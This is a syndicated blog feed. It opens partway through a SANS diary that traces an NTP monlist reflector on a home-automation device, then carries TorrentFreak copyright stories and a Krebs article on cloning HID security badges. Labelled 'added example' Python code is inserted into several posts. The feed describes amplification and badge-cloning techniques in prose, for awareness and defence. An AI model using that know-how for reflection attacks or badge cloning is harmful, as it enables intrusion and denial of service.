172.16.1.64:123, f: 204.83.20.117:53177, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:43397, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:15673, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:17275, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:63467, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:56970, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:64682, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:26332, n: XXX.160.28.174:123
172.16.1.64:123, f: 101.166.182.210:80, n: XXX.160.28.174:123

According to the NAT table, the address behind the gateway router that is initiating the outbound UDP sessions is at 172.16.1.64. The device table shows it as:

Name: home-controller-300-000FFF13C150
Hardware Address: 00:0f:ff:13:c1:50

That MAC address is owned by a company called Control4, which makes popular home automation devices. It is clear that the Control4 device has a configuration problem. There is likely no reason for Control4 to be running an NTP server on a home automation device, and certainly that NTP server should not support the monlist command. Most likely this is a result of a common Linux/Unix pitfall: when you implement an NTP client on a *nix platform you almost always wind up with an NTP server enabled as well, which you need to disable manually. Either way, I was in contact with Control4; they were aware of the issue and have released a patch, so any Control4 devices that call home to the mothership should be resolved. Unfortunately they have a significant number of devices that, for some reason, don’t call home and can’t be patched until they do. But this is not just a Control4 problem. In the course of my investigation I found Macintosh computers, FreeNAS devices, Dell servers and D-Link storage devices displaying the same behavior. But even if there is a misconfigured NTP server on one of these networks, if the firewall is working properly then no uninitiated connections should be permitted in to these devices, and they should not be usable as a reflector.
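As an added example that is not part of the diary, the following Python detector reads NAT-table lines in the layout quoted above and flags an inside host whose NTP port is answering foreign endpoints on non-NTP ports, which is what a reflector looks like from the gateway; the sample log is constructed from a subset of the diary’s entries plus two ordinary DNS lookups from a hypothetical second host.

```python
"""Added example (not the diary's code): spot an internal host that is answering
unsolicited NTP queries, i.e. acting as a reflector, from gateway NAT-table lines
in the "inside, f: foreign, n: translated" layout quoted in the diary."""
import re
from collections import Counter, defaultdict

NTP_PORT = 123

# One NAT entry: "<inside ip>:<port>, f: <foreign ip>:<port>, n: <public ip>:<port>".
# [\w.]+ rather than a strict dotted quad so the diary's masked "XXX.160.28.174" parses.
NAT_LINE = re.compile(
    r"^(?P<in_ip>[\w.]+):(?P<in_port>\d+),\s*f:\s*(?P<f_ip>[\w.]+):(?P<f_port>\d+),"
    r"\s*n:\s*(?P<n_ip>[\w.]+):(?P<n_port>\d+)$"
)

# Constructed sample: a subset of the entries from the diary plus two ordinary DNS
# lookups from a hypothetical second host, so the detector has something to leave alone.
SAMPLE_NAT_LOG = """\
172.16.1.64:123, f: 192.75.12.11:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 199.182.221.110:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 94.185.82.194:443, n: XXX.160.28.174:123
172.16.1.64:123, f: 60.226.113.100:80, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:24572, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:38553, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:47782, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:53177, n: XXX.160.28.174:123
172.16.1.64:123, f: 101.166.182.210:80, n: XXX.160.28.174:123
172.16.1.77:51234, f: 192.0.2.53:53, n: XXX.160.28.174:51234
172.16.1.77:51235, f: 192.0.2.53:53, n: XXX.160.28.174:51235
"""


def parse_nat_log(text):
    """Return (inside_ip, inside_port, foreign_ip, foreign_port) per entry,
    skipping lines that do not match the layout."""
    entries = []
    for line in text.splitlines():
        m = NAT_LINE.match(line.strip())
        if m:
            entries.append((m["in_ip"], int(m["in_port"]),
                            m["f_ip"], int(m["f_port"])))
    return entries


def find_ntp_reflectors(entries, min_suspect_sessions=3):
    """For each inside host whose *source* port is 123, split its sessions into
    normal time sync (foreign port 123, ntpd talking to ntpd) and suspect ones
    (foreign port is anything else).  A 123 -> ephemeral-port session can only
    exist if a packet from outside reached our NTP port first; with no port
    forward in place that is exactly what the firewall should have blocked.
    In a reflection attack those foreign addresses are the spoofed victims."""
    sync = defaultdict(set)       # inside ip -> foreign NTP peers
    suspect = defaultdict(list)   # inside ip -> (foreign ip, foreign port)
    for in_ip, in_port, f_ip, f_port in entries:
        if in_port != NTP_PORT:
            continue
        if f_port == NTP_PORT:
            sync[in_ip].add(f_ip)
        else:
            suspect[in_ip].append((f_ip, f_port))

    report = {}
    for in_ip, sessions in suspect.items():
        if len(sessions) < min_suspect_sessions:
            continue
        victims = Counter(ip for ip, _ in sessions)
        report[in_ip] = {
            "sync_peers": len(sync[in_ip]),
            "suspect_sessions": len(sessions),
            # most-hit foreign address first: the party whose abuse desk to notify
            "likely_victims": sorted(victims.items(), key=lambda kv: (-kv[1], kv[0])),
        }
    return report


if __name__ == "__main__":
    for host, info in find_ntp_reflectors(parse_nat_log(SAMPLE_NAT_LOG)).items():
        print(f"{host}: {info['suspect_sessions']} unsolicited NTP sessions, "
              f"{info['sync_peers']} real sync peers; most-hit: {info['likely_victims'][0]}")
```

A single hit on the inside NTP port is not proof by itself, so the threshold is kept separate; on the diary’s full table the same host would score far higher.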

An nmap scan shows not only that it is possible to connect through the firewall, but that there is clearly an NTP server answering queries, and that it permits the monlist command, maximizing the amplification.

123/udp open          ntp     NTP v4
| ntp-monlist: 
|   Target is synchronised with 206.108.0.133
|   Alternative Target Interfaces:
|       172.16.1.64
|   Public Servers (4)
|       142.137.247.109 174.142.10.100  198.27.76.239   206.108.0.133
|   Other Associations (166)
|       24.220.174.96 seen 7615 times. last tx was unicast v2 mode 7
|       193.25.121.1 seen 2084 times. last tx was unicast v2 mode 7
|       66.26.0.192 seen 406 times. last tx was unicast v2 mode 7
|       109.200.131.2 seen 11079 times. last tx was unicast v2 mode 7
|       79.88.149.109 seen 15356 times. last tx was unicast v2 mode 7
|       66.176.8.42 seen 90397 times. last tx was unicast v2 mode 7
|       84.227.75.171 seen 58970 times. last tx was unicast v2 mode 7
|       82.35.229.219 seen 952 times. last tx was unicast v2 mode 7
|       96.20.156.186 seen 2123 times. last tx was unicast v2 mode 7
|       216.188.239.159 seen 178 times. last tx was unicast v2 mode 7
|       184.171.166.72 seen 923 times. last tx was unicast v2 mode 7
|       94.23.230.186 seen 96 times. last tx was unicast v2 mode 7
… total of 166 entries

This is where I will end the story for now. What do you think is happening?  Conclusion Tuesday August 19th.

– Rick Wanner – rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: WWE Asked Google to Hit Live Piracy…From the Future

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Removing content from the Internet has become big business in recent years, with rightsholders from all over the globe seeking to limit access to infringing content.

As the world’s leading search engine, Google receives millions of DMCA-style notices every week. Its internal systems, both automated and human-reviewed, then attempt to assess the validity of the notices before removing URLs from its indexes.

What these notices all have in common is that they refer to infringements that have already taken place, since that’s the nature of a takedown. However, a notice that recently appeared in Google’s Transparency Report reveals that for at least one organization, looking into the future is now also on the agenda.

The notice was sent by an anti-piracy company working on behalf of World Wrestling Entertainment, or WWE as it’s more commonly known. The notice aimed to tackle piracy of a WWE Event titled Money In The Bank 2014, which took place on June 29, 2014. However, the notice was sent to Google two days before, on June 27.

“The following links infringe on WWE’s copyrighted Pay Per View event Money In The Bank 2014, set to air this Sunday, June 29, by one or more of the following means,” the notice begins.

WWE then sets out three potential infringements.


“Providing a link to a free (pirated) stream of this event” is misleading since it’s impossible to link to an event that hasn’t aired yet. Conceivably an advance static link could have been set up to air the event come June 29, but on June 27 the event had definitely not aired, hence no piracy.

“Providing a promise of DIRECT free streaming of this event on the identified site” seems no different from the allegation made above. It’s certainly possible that some of the sites promised to illegally stream the event, but at the date of the notice that would have been impossible.

The fact that WWE resorted to telling Google that the event’s predictions show was the source material being infringed upon shows that no actual live event infringements had yet taken place.

The final claim – “Using copyrighted images, logos and celebrity photos to promote the site” – is one that carries far more weight than the two key instances of infringement alleged above. Some of the sites listed did use WWE artwork to promote their upcoming streams, but there were some notable omissions, not least the homepage of Justin.tv. Google refused to comply in this and three other instances.

The notice from WWE, which can be viewed here, illustrates the problems faced by companies airing live events. While outfits such as WWE often know where streams and links to streams will appear once an event goes live, taking them down quickly once it actually begins may not always go as smoothly as they would like.

While attempts at a pro-active DMCA-style notice like this might work on a small scale, it’s not difficult to imagine the chaos that would ensue if all rightsholders tried to have unauthorized content removed before it even appeared online.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: TalkTalk Wants Resellers to Warn Pirating Customers

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Unlike those in the US, Internet providers in the UK are not obliged to forward copyright infringement notices to their subscribers. This means that local Internet users are spared the typical warnings that are so common elsewhere.

Despite the lack of a legal requirement, some anti-piracy groups do send copyright infringement notices to UK ISPs. In most cases these are ignored by the providers, but last week TalkTalk forwarded a notice to one of its resellers.

In the email the ISP asks Opal Solutions to forward the notice in question to one of its subscribers who allegedly shared a pirated copy of “Godzilla”. In addition the reseller was urged to take “preventive” measures, but what these should be is left open.

“Please see below copyright infringement email regarding an IP address of one of your clients, Please inform your client and take necessary preventative measures,” TalkTalk wrote.

At the bottom of this article is a copy of the original copyright infringement notice TalkTalk forwarded. It is a typical DMCA style notice sent by IP Echelon on behalf of Warner Bros.

IP Echelon didn’t make any effort to customize the notice for the UK audience. The email specifically references US copyright law, which doesn’t apply to the reseller or TalkTalk.

What’s most noteworthy, though, is that TalkTalk has decided to pass on this notice. The ISP is not known to forward these notices to its own subscribers, yet they appear to be urging a reseller to go beyond what’s required by law.

The forwarded email is most likely an attempt to avoid any type of liability. The question that remains is this: if TalkTalk do this with resellers does this mean they will start warning their subscribers as well?

Earlier this year the news broke that TalkTalk and other UK providers will voluntarily start sending infringement notices under the VCAP program. While VCAP isn’t going into effect before the summer of 2015, TalkTalk’s forwarded infringement notice could suggest that they might do something sooner.

Below is a full copy of the copyright infringement notice.

—-

We are writing this message on behalf of Warner Bros. Entertainment Inc..

We have received information that an individual has utilized the
below-referenced IP address at the noted date and time to offer
downloads of copyrighted material.

The title in question is: Godzilla

The distribution of unauthorized copies of copyrighted television
programs constitutes copyright infringement under the Copyright Act,
Title 17 United States Code Section 106(3). This conduct may also
violate the laws of other countries, international law, and/or treaty
obligations.

Since you own this IP address
we request that you immediately do the following:

1) Contact the subscriber who has engaged in the conduct described
above and take steps to prevent the subscriber from further downloading
or uploading Warner Bros. Entertainment Inc. content without authorization; and

2) Take appropriate action against the account holder under your Abuse
Policy/Terms of Service Agreement.

On behalf of Warner Bros. Entertainment Inc., owner of the exclusive rights
in the copyrighted material at issue in this notice, we hereby state that
we have a good faith belief that use of the material in the manner
complained of is not authorized by Warner Bros. Entertainment Inc.,
its respective agents, or the law.

Also, we hereby state, under penalty of perjury, that we are authorized
to act on behalf of the owner of the exclusive rights being infringed
as set forth in this notification.

We appreciate your assistance and thank you for your cooperation in this
matter. Your prompt response is requested.

Any further enquiries can be directed to copyright@ip-echelon.com
Please include this message with your enquiry to ensure a swift response.

Respectfully,

Adrian Leatherland
CEO
IP-Echelon
Email: copyright@ip-echelon.com
Address: 6715 Hollywood Blvd, Los Angeles, 90028, United States

- ————- Infringement Details ———————————-
Title: Godzilla
Timestamp: 2014-08-13T14:06:26Z
IP Address:
Port: 60261
Type: BitTorrent
Torrent Hash: c5cdf551eea353484657d45dbe93f688575a1e31
Filename: Godzilla.2014.WEBRiP.XviD-VAiN
Filesize: 2485 MB
- ———————————————————————

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Issues with Microsoft Updates, (Sat, Aug 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Microsoft has updated some bulletins because there are three known issues that can affect your computer.

  • when KB2982791 is installed, fonts that are installed in a location other than the default fonts directory (%windir%\fonts) cannot be changed when they are loaded into any active session
  • Fonts do not render correctly after any of the following updates are installed:
    • 2982791 MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
    • 2970228 Update to support the new currency symbol for the Russian ruble in Windows
    • 2975719 August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
    • 2975331 August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012
  • Microsoft is investigating behavior in which systems may crash with a 0x50 Stop error message (bugcheck) after any of the following updates are installed:
    • 2982791 MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
    • 2970228 Update to support the new currency symbol for the Russian ruble in Windows
    • 2975719 August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
    • 2975331 August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012

If you have not yet installed those updates, please don’t install them until Microsoft publishes a fix. If you have already installed them, please check each article for mitigation measures.

Manuel Humberto Santander Peláez
SANS Internet Storm Center – Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: I Visited Pirate Bay’s Peter Sunde in Prison, Here’s What he Had to Say

This post was syndicated from: TorrentFreak and was written by: Julia Reda. Original post: at TorrentFreak

by Julia Reda

It wasn’t easy to meet Peter in prison. Initially, his request for the approval of my visit was rejected, as have been requests on behalf of other friends. It was only when he read up on the regulations and filed a complaint – pointing out my status as an elected representative of the European Parliament – that my visit was approved.

He tells me that this is par for the course in prison. “If you don’t constantly insist upon your rights, you will be denied them”. Repeatedly, he had to remind the guards that they’re not allowed to open confidential mail he receives from journalists. His alleged right to an education or occupation during his jail time in practice amounted to being given a beginners’ Spanish book.

“Prison is a bit like copyright,” Peter remarks. In both areas, there is a lack of transparency and the people in power profit from the fact that the average person doesn’t pay a lot of attention to the issue. That opens the door to misuse and corruption.

Few people feel directly affected by these systems (even though a lot of Internet users commit copyright infringements, many don’t even realize that they are breaking laws and suffer no repercussions). Hence it is difficult to get traditional politics to change even the most blatant injustices that these systems produce. I ask him whether his imprisonment has changed his political views.

“It has confirmed them,” he replies. “I knew the system was broken before, but now I know to what extent.”

“The worst thing is the boredom”, Peter informs me when I ask him about life in prison. He gives an account of his daily routine: “I have soy yoghurt and muesli for breakfast, which I was recently allowed to buy from my own money, as the prison doesn’t offer any vegan food.”

That is followed by one hour of exercise – walking around the yard in circles – and sometimes the chance to play ping-pong or visit the prison library in the afternoon, before Peter is locked in his cell for the night. The only other distraction comes from the dozens of letters Peter receives every day.

Not all the books that his friends and supporters send make their way to him – they are screened for “inappropriate content” first. Other items that arrive in the mail, such as vegan candy, won’t be handed out to him until after his release, “but at least the prison has to catalog every single thing you send me, which pisses them off,” Peter says with a wink.

While his notoriety mostly comes from his role in founding the Pirate Bay, Peter has been critical of the platform’s development for a long time and has been focusing his energy on other projects.

“There should be 10,000 Pirate Bays by now!” he exclaims. “The Internet was built as a decentralized network, but ironically it is increasingly encouraging centralization. Because The Pirate Bay has been around for 11 years now, almost all other torrent sites started relying on it as a backbone. We created a single point of failure and the development of file sharing technology got stuck.”

In Peter’s eyes, the Pirate Bay has run its course and turned into a commercial enterprise that has little to do with the values it was founded on. Nowadays, the most important battles for an open Internet take place elsewhere, he says, noting that the trend towards centralization is not limited to file sharing.

Facebook alone has turned into its own little walled-garden version of the Internet that a lot of users would be content using without access to the wider Net. At the same time, services from Google to Wikipedia are working on distribution deals that make their services available to people without real Internet access.

One step to counter this trend towards centralization could be data portability, the right to take all one’s personal data from a service such as Facebook and bring it along to a competitor. The right to data portability is part of the proposed European data protection regulation that is currently stuck in negotiations among the EU member states.

“Having data portability would be a great step forward, but it’s not enough. Portability is meaningless without competition.” Peter says.

“As activists and entrepreneurs, we need to challenge monopolies. We need to build a Pirate social network that is interoperable with Facebook. Or build competition to small monopolies before they get bought up by the big players in the field. Political activism in parliaments, as the Pirate Party pursues it, is important, but needs to be combined with economic disruptions.

“The Internet won’t change fundamentally in the next two years, but in the long-term, the effects of the decisions we take today can be dramatic.”

According to Peter, establishing net neutrality, especially on mobile networks, will be one of the crucial fights. The Internet may have started out as a non-commercial space, but is entirely ruled by business arguments nowadays, and without net neutrality, large corporations will be able to strengthen their monopolies and stifle innovation. A pushback will be needed from small enterprises as well as civil society – but those groups struggle to be heard in political debates as they often lack the financial resources for large-scale lobbying efforts.

Although Peter is visibly affected by his imprisonment and talks about struggling with depression, he has not stopped making plans for the future. “Things will get easier once I get out. I’ve been a fugitive for two years and could hardly go to conferences or would have to show up unannounced.”

Once his eight month sentence has come to an end, Peter wants to get back to activism. When I ask about his upcoming projects, he starts grinning and tells me to be patient.

“All I can say now is that I’m brimming with ideas and that one of my main goals will be to develop ethical ways of funding activism. You often need money to change things. But most ways of acquiring it require you to compromise on your ideals. We can do better than that.”

Peter is now hoping for his prison sentence to eventually be transformed into house arrest, which would allow him to see his critically ill father and spend less time in isolation. Whether that happens will largely depend on whether the Swedish state will continue to view a file-sharing activist as a serious threat to the public. In a society where the majority of young people routinely break copyright law simply by sharing culture, that view seems entirely unsustainable.

About The Author

Julia Reda is a German politician for the Pirate Party Germany and a member of the European Parliament since 2014, where she serves as a Vice-President of the Greens/EFA group. She is also the chairperson of the Young Pirates of Europe.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Lionsgate Targets Hosting Providers & Domain Registrars Over Expendables 3 Piracy

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Today sees the official premiere of The Expendables 3, but what was supposed to be a celebration for the makers has turned into a fiasco.

Three weeks ago a high quality leak of the film appeared online. This resulted in millions of downloads long before it reached the big screen.

Fearing a massive loss in revenue, Lionsgate issued thousands of takedown requests to limit the leak’s availability and sued six file-sharing sites that allegedly failed to respond to these notices.

It now appears that Lionsgate has more tricks up its sleeve. The owner of cloud hosting service filecloud.io informs TorrentFreak that he never heard from Lionsgate, yet the movie studio is now going after his DDoS protection provider Cloudflare and domain registrar Easyname.

TorrentFreak obtained a copy of the notice, which is also believed to have been sent to the service providers of several other file-sharing sites. In the notice Lionsgate’s law firm Kilpatrick Townsend & Stockton requests that these companies render the sites in question unavailable.

The law firm lists several allegedly infringing URLs and points out that the hosting providers and domain name registrars have to take responsibility.

part of Lionsgate’s notice

The following text comes from a notice Cloudflare and others received, accusing the company of potentially assisting a criminal operation and ignoring a previous notice.

“In accordance with the DMCA, we have already notified you of the infringement, but you have continued to cause, enable, induce, facilitate and materially contribute to the infringement by continuing to provide your users with the means to unlawfully distribute, reproduce and otherwise exploit The Expendables 3,” the email reads.

The same takedown notice was also sent to the domain name registrar Easyname, who were encouraged to “take action” against the allegedly infringing site under ICANN rules. In their notice Lionsgate appears to hint at a domain name suspension.

“If you are the domain name registrar for the domain name referenced above, under ICANN rule 3.18.1, you are required to take reasonable and prompt steps to investigate and respond appropriately to any reports of abuse,” the notice reads.

“You are hereby put on notice that despite Rule 3.18, and the website owner’s representation to you that it is not using the domain name ‘in violation of any applicable laws’, the owner is either directly infringing the rights of Lionsgate or contributing to such infringement through the distribution of the stolen work referenced above,” it adds.

Lionsgate’s methods are unusual as the operator of filecloud.io was never contacted by the movie studio’s law firm. There were abuse mails sent by other outfits though, and the URLs listed in the takedown notice were already taken offline. This means that the infringing pages listed by Lionsgate were directed to a 404 page.

The owner of filecloud.io informs TF that he’s not happy with the pressure Lionsgate has put on the companies he works with, especially since they failed to first contact the site itself.

“It might be nice if these complaining entities actually checked that their emails have a valid claim before firing them off to everyone under the moon,” filecloud.io’s owner notes.

“The majority of notices I get daily are dud but at least none of them go out of their way forwarding their gripe to everyone who has anything remotely to do with the site,” he adds.

In this case the notices haven’t yet caused any trouble for filecloud.io, but it’s not hard to imagine a scenario in which smaller companies are easily threatened to pull the plug on an accused site.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: How Secure is Your Security Badge?

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Security conferences are a great place to learn about the latest hacking tricks, tools and exploits, but they also remind us of important stuff that was shown to be hackable in previous years yet never really got fixed. Perhaps the best example of this at last week’s annual DefCon security conference in Las Vegas came from hackers who built on research first released in 2010 to show just how trivial it still is to read, modify and clone most HID cards — the rectangular white plastic “smart” cards that organizations worldwide distribute to employees for security badges.

HID iClass proximity card.

Nearly four years ago, researchers at the Chaos Communication Congress (CCC), a security conference in Berlin, released a paper (PDF) demonstrating a serious vulnerability in smart cards made by Austin, Texas-based HID Global, by far the largest manufacturer of these devices. The CCC researchers showed that the card reader device that HID sells to validate the data stored on its then-new line of iClass proximity cards includes the master encryption key needed to read data on those cards.

More importantly, the researchers proved that anyone with physical access to one of these readers could extract the encryption key and use it to read, clone, and modify data stored on any HID cards made to work with those readers.

At the time, HID responded by modifying future models of card readers so that the firmware stored inside them could not be so easily dumped or read (i.e., the company removed the external serial interface on new readers). But according to researchers, HID never changed the master encryption key for its readers, likely because doing so would require customers using the product to modify or replace all of their readers and cards — a costly proposition by any measure given HID’s huge market share.

Unfortunately, this means that anyone with a modicum of hardware hacking skills, an eBay account, and a budget of less than $500 can grab a copy of the master encryption key and create a portable system for reading and cloning HID cards. At least, that was the gist of the DefCon talk given last week by the co-founders of Lares Consulting, a company that gets hired to test clients’ physical and network security.

Lares’ Joshua Perrymon and Eric Smith demonstrated how an HID parking garage reader capable of reading cards up to three feet away was purchased off of eBay and modified to fit inside a common backpack. Wearing this backpack, an attacker looking to gain access to a building protected by HID’s iClass cards could obtain that access simply by walking up to an employee of the targeted organization and asking for directions, a light for a cigarette, or some other pretext.

Card cloning gear fits in a briefcase. Image: Lares Consulting.

Perrymon and Smith noted that, thanks to software tools available online, it’s easy to take card data gathered by the mobile reader and encode it onto a new card (also broadly available on eBay for a few pennies apiece). Worse yet, the attacker is then also able to gain access to areas of the targeted facility that are off-limits to the legitimate owner of the card that was cloned, because the ones and zeros stored on the card that specify that access level also can be modified.
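The modifiable access bits are the part of this a systems designer can do something about without replacing hardware. The following is an added illustration, not HID’s or Lares Consulting’s code: a hypothetical access-control backend that treats the card purely as an identifier and takes the authorization decision from a server-side issuance record, so rewriting the zone bits on a cloned card buys nothing, and a mismatch between the card’s own claim and the record is surfaced as a tamper signal. The card ids, zone names and ACL are constructed. Note what this does not fix: a faithful clone of a card that was legitimately issued for a zone still opens that zone, which is why the article’s shielding-sleeve advice still applies.

```python
"""Added illustration of the design point behind the cloning risk above:
treat the card only as an identifier and decide access from a server-side
record, never from access bits read off the card. Hypothetical design, not
HID's or Lares Consulting's code; card ids, zones and the ACL are constructed."""
from dataclasses import dataclass

# Constructed issuance record: card id -> zones the organisation actually granted.
ISSUED_CARDS = {
    "0x1A2B3C": {"lobby", "office-3"},
    "0x4D5E6F": {"lobby", "office-3", "datacenter"},
}


@dataclass(frozen=True)
class BadgeRead:
    card_id: str        # identifier the reader recovered from the card
    on_card_zone: str   # access claim stored on the card itself (rewritable by whoever can clone it)
    reader_zone: str    # zone this reader guards


def authorize_trusting_card(read: BadgeRead) -> bool:
    """Weak pattern: the decision rests on data the card carries about itself."""
    return read.on_card_zone == read.reader_zone


def authorize_server_side(read: BadgeRead, acl=None):
    """Hardened pattern: the card id is only a lookup key; rights come from the ACL.
    Returns (allowed, alerts); alerts are tamper signals worth logging."""
    acl = ISSUED_CARDS if acl is None else acl
    alerts = []
    granted = acl.get(read.card_id)
    if granted is None:
        return False, ["card id not in issuance record"]
    if read.on_card_zone not in granted:
        # The card claims a zone it was never issued: consistent with modified card data.
        alerts.append(f"card {read.card_id} claims {read.on_card_zone!r}, never issued")
    return read.reader_zone in granted, alerts


if __name__ == "__main__":
    # Constructed scenario: a lobby/office card cloned with its zone bits rewritten.
    cloned = BadgeRead("0x1A2B3C", on_card_zone="datacenter", reader_zone="datacenter")
    print("trusting card:", authorize_trusting_card(cloned))  # True
    print("server-side:", authorize_server_side(cloned))      # (False, [one alert])
```

The alert list is the detection hook: a card whose stored claim disagrees with the issuance record is either corrupted or has been written to, and either way the event deserves a log entry rather than a silent deny.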

Smith said he and Perrymon wanted to revive the issue at DefCon to raise awareness about a widespread vulnerability in physical security. HID did not respond to multiple requests for comment.

“Until recently, no one has really demonstrated properly what the risk is to a business here,” Smith said. “SCADA installations, hospitals, airports…a lot of them use HID cards because HID is the leader in this space, but they’re using compromised technology. Your card might not have data center or HR access but I can get into those places within your organization just by coming up to some employee standing outside the building and bumming a light off of him.”

Organizations that are vulnerable have several options. Probably the cheapest involves the use of some type of sleeve for the smart cards. The wireless communications technology that these cards use to transmit data — called radio-frequency identification or RFID – can be blocked when not in use by storing the key cards inside a special RFID-shielding sleeve or wallet. Of course, organizations can replace their readers with newer (perhaps non-HID?) technology, and/or add biometric components to card readers, but these options could get pricey in a hurry.

A copy of the slides from Perrymon and Smith’s DefCon talk is available here.

TorrentFreak: Most-Pirated Movies, TV-Shows and Games Per State… Debunked

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Piracy is a hot topic, so when there are statistics to report the media is usually all over it. This week a series of intriguing maps has been doing the rounds.

The data was first published by the piracy experts over at Movoto Real Estate. Based on a large sample of three million unique IP addresses collected over a period of 40 days they presented a map of the most torrented movies, TV-shows and games per state.

This was quickly picked up by The Washington Post, Venturebeat and several other publications, who all shared the findings with their readers. TorrentFreak was ready to jump on the bandwagon too, but we couldn’t help noticing a few odd results.

What stands out immediately is that some of the most-downloaded movies in certain states are barely downloaded at all through torrent sites. “La Grande Bellezza” in New Jersey, for example, or “Cuban Fury” in Florida. The same is true for “Witching and Bitching” which, according to the map, is very popular in Indiana and Tennessee.

Are these movies really more often downloaded than blockbuster successes such as Divergent and X-Men as the map below suggests?

Map: Most pirated movies per state?

The same odd results appear in the games and TV-show maps. Game of Thrones is by far the most downloaded TV-show in America, but for some reason “Awkward” is more popular in Texas and Louisiana. The same Louisianans also download the game “Scribblenauts Unlimited” more frequently than popular releases such as Minecraft and Watch Dogs.

Something is clearly amiss, so we took the unprecedented step of downloading the source data which is readily available.

To our surprise, the maps in question don’t represent the most-downloaded titles. Instead, they appear to reveal for which shows the download numbers differ the most when compared to the national average. This is completely unrelated to which movie, TV-show or game was downloaded the most.

Map: Whoops, not downloads but variation from the national average

Now back to our earlier question. Is “La Grande Bellezza” really that popular in New Jersey? No, the actual data shows only 2 downloads in this state…

Similarly, is “Awkward” the most pirated TV-show in Texas? Again, no, it has 232 downloads in the dataset compared to 2,554 for a single Game of Thrones episode. And we can go on and on.

In fact, if we made a real map based on the actual download counts in the dataset, Game of Thrones would be the most downloaded show in each and every state, as expected.
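To make the difference between the two readings concrete, here is an added example (not TorrentFreak’s or Movoto’s code, and not the real dataset) that takes one set of per-state download counts and picks a “top” title per state two ways: by raw count, and by how far the title’s share in that state departs from its national share. The counts are constructed to mirror the article’s Texas numbers; the deviation measure (ratio of state share to national share) is an assumption about what the maps computed, since the article only says the numbers “differ the most” from the national average.

```python
"""Added example (not TorrentFreak's or Movoto's code): two ways to pick a
'top' title per state from the same download counts. The dataset below is
constructed to mirror the article's point; the deviation metric is assumed."""
from collections import defaultdict

# Constructed counts: (state, title) -> downloads in the sample.
COUNTS = {
    ("TX", "Game of Thrones"): 2554, ("TX", "Awkward"): 232, ("TX", "Breaking Bad"): 900,
    ("NY", "Game of Thrones"): 3000, ("NY", "Awkward"): 40,  ("NY", "Breaking Bad"): 1200,
    ("CA", "Game of Thrones"): 4000, ("CA", "Awkward"): 60,  ("CA", "Breaking Bad"): 1500,
}


def shares_by_state(counts):
    """Each title's share of its own state's total downloads."""
    totals = defaultdict(int)
    for (state, _), n in counts.items():
        totals[state] += n
    return {(s, t): n / totals[s] for (s, t), n in counts.items()}


def national_shares(counts):
    """Each title's share of all downloads across every state."""
    total = sum(counts.values())
    per_title = defaultdict(int)
    for (_, t), n in counts.items():
        per_title[t] += n
    return {t: n / total for t, n in per_title.items()}


def top_by_downloads(counts):
    """What a 'most pirated per state' map should show: the largest raw count."""
    best = {}
    for (s, t), n in counts.items():
        if s not in best or n > counts[(s, best[s])]:
            best[s] = t
    return best


def top_by_deviation(counts):
    """What the maps apparently showed: the title whose state share exceeds its
    national share by the largest ratio. A title with tiny absolute numbers
    can win this easily."""
    shares = shares_by_state(counts)
    nat = national_shares(counts)
    best, best_ratio = {}, {}
    for (s, t), share in shares.items():
        ratio = share / nat[t]
        if s not in best or ratio > best_ratio[s]:
            best[s], best_ratio[s] = t, ratio
    return best


if __name__ == "__main__":
    print("by downloads:", top_by_downloads(COUNTS))   # Game of Thrones everywhere
    print("by deviation:", top_by_deviation(COUNTS))   # Texas: Awkward, with 232 downloads
```

With these numbers the raw-count map puts Game of Thrones first in every state, while the deviation map hands Texas to “Awkward” on 232 downloads, which is exactly the kind of result the article flags as odd.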

Confusingly, however, a map of the most pirated movies per state would list “Blood Widow” on top in pretty much every state.

This suggests that there’s an issue with the data itself too, as this movie is nowhere to be found in the list of most shared files on The Pirate Bay and elsewhere. The most likely explanation is that the researchers ran into a fake torrent file with bogus IP-addresses.

Whatever the case, it’s safe to say that the maps in question should be taken with a grain of salt, or a barrel of rum perhaps.


Raspberry Pi: Pi Wars

This post was syndicated from: Raspberry Pi and was written by: Helen Lynn. Original post: at Raspberry Pi

Helen: This December will see a Cambridge Raspberry Jam with a difference; we’re giving you all plenty of notice, so that you have time to prepare. We’ll let organisers Michael Horne and Tim Richardson tell you all about it.

Pi Wars
